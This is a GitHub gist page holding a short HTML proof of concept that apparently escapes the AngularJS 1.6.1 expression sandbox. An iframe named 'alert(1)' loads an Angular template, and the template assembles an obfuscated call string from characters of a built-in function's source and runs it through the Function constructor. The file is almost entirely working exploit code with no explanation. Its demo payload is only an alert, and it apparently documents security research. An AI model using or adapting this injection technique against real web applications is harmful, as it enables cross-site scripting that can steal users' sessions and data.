Skip to content

Instantly share code, notes, and snippets.

@koto
Created January 12, 2017 13:26
Show Gist options
  • Save koto/536732df91493e80415b8fc137952de0 to your computer and use it in GitHub Desktop.
Save koto/536732df91493e80415b8fc137952de0 to your computer and use it in GitHub Desktop.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
<iframe name=alert(1) src="data:text/html,
<body ng-app>
<script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script>
<div>{{1338-1}}</div>
// Works in Chrome, correct offsets for FF
<div>{{
c=[].map.toString();this.constructor.constructor(c[23]+c[22]+c[19]+[].fill.name[3]+c[12]+c[7]+c[10]+c[9]+c[23]+c[13]
)()
}}</div>
</body>
"></iframe>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment